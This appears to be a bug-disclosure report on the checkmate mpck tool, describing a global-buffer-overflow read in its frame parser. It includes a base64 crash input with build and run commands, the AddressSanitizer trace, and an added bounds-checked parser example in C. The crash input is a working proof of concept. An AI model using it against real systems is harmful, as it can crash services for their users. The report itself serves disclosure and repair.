Classic Buffer Overflow in sjord/checkmate
Oct 4th 2021
Good morning, I hope this message finds you well during these challenging times. Whilst testing checkmate built from commit 8e497d8, we discovered crafted input which triggers a bug in the frame parsing code, leading to a global-buffer-overflow, READ of size 4.
Proof of Concept
git clone https://github.com/Sjord/checkmate
LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure
make

echo "////MA==" | base64 -d > /tmp/crash0000.fuzz
./mpck -v -x /tmp/crash0000.fuzz
==17016==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231804 at pc 0x00000030f290 bp 0x7ffffe05aeb0 sp 0x7ffffe05aea8
READ of size 4 at 0x000000231804 thread T0
    #0 0x30f28f in parseframe /root/checkmate/mpck/checkframe.c:132:19
    #1 0x30f28f in findframe /root/checkmate/mpck/checkframe.c:212:5
    #2 0x309b3a in findlastframe /root/checkmate/mpck/checkfile.c:102:9
    #3 0x309b3a in checkfile /root/checkmate/mpck/checkfile.c:144:2
    #4 0x305ffa in checkargument /root/checkmate/mpck/checkarguments.c:83:9
    #5 0x312cfb in checkarguments /root/checkmate/mpck/checkarguments.c:256:13
    #6 0x312cfb in main /root/checkmate/mpck/main.c:167:15
    #7 0x7fd0868460b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x25500d in _start (/root/checkmate/mpck/mpck+0x25500d)

0x000000231804 is located 60 bytes to the left of global variable '<string literal>' defined in 'checkframe.c:145:31' (0x231840) of size 15
  '<string literal>' is ascii string 'CRC read error'
0x000000231804 is located 0 bytes to the right of global variable 'samplerate_matrix' defined in './matrices.h:43:12' (0x2317e0) of size 36
SUMMARY: AddressSanitizer: global-buffer-overflow /root/checkmate/mpck/checkframe.c:132:19 in parseframe
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code.
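The trace above faults in parseframe on a 4-byte read just past samplerate_matrix, a 36-byte global, which is consistent with a 3x3 table of ints indexed one column too far; the PoC "////MA==" decodes to the bytes ff ff ff 30, whose 2-bit sampling-rate field is 11, the value the MPEG audio header format reserves. Below is an added example, not checkmate's own code, of a frame-header parser that rejects every reserved field value before any table lookup; the table layout, field names and function name are assumptions made for this write-up.

```c
/* Added example, not checkmate's own code: a bounds-checked MPEG audio
 * frame-header parser. Table layout and names are assumptions. */
#include <stdint.h>
#include <stdio.h>
/* Hz, indexed [version_row][samplerate_index]; assumed layout. */
static const int samplerates[3][3] = {
    {44100, 48000, 32000},   /* MPEG 1   */
    {22050, 24000, 16000},   /* MPEG 2   */
    {11025, 12000,  8000},   /* MPEG 2.5 */
};

enum { HDR_OK = 0, HDR_NO_SYNC = -1, HDR_RESERVED = -2 };

struct frame_header {
    int version_row;    /* 0 = MPEG 1, 1 = MPEG 2, 2 = MPEG 2.5 */
    int layer;          /* 1, 2 or 3 */
    int bitrate_index;  /* 0 = free format, 1..14 = table index */
    int samplerate;     /* Hz */
};

/* Returns HDR_OK and fills *h, or a negative code for missing sync or a
 * reserved field value. Every index is validated before any table lookup,
 * so a sampling-rate field of 11 can never read past a 3-entry row. */
int parse_frame_header(const uint8_t hdr[4], struct frame_header *h)
{
    if (hdr[0] != 0xFF || (hdr[1] & 0xE0) != 0xE0)   /* 11 sync bits */
        return HDR_NO_SYNC;
    unsigned version_bits   = (hdr[1] >> 3) & 0x3; /* 00=2.5 01=rsvd 10=2 11=1 */
    unsigned layer_bits     = (hdr[1] >> 1) & 0x3; /* 00=rsvd 01=III 10=II 11=I */
    unsigned bitrate_index  = (hdr[2] >> 4) & 0xF; /* 1111 = bad */
    unsigned samplerate_idx = (hdr[2] >> 2) & 0x3; /* 11 = reserved */
    if (version_bits == 1 || layer_bits == 0 || bitrate_index == 15 ||
        samplerate_idx == 3)
        return HDR_RESERVED;

    static const int version_row[4] = {2, -1, 1, 0};
    h->version_row   = version_row[version_bits];
    h->layer         = 4 - (int)layer_bits;
    h->bitrate_index = (int)bitrate_index;
    h->samplerate    = samplerates[h->version_row][samplerate_idx];
    return HDR_OK;
}

int main(void)
{
    const uint8_t poc[4] = {0xFF, 0xFF, 0xFF, 0x30};  /* "////MA==" decoded */
    struct frame_header h;
    printf("PoC header rc=%d (expect %d)\n", parse_frame_header(poc, &h), HDR_RESERVED);
    return 0;
}
```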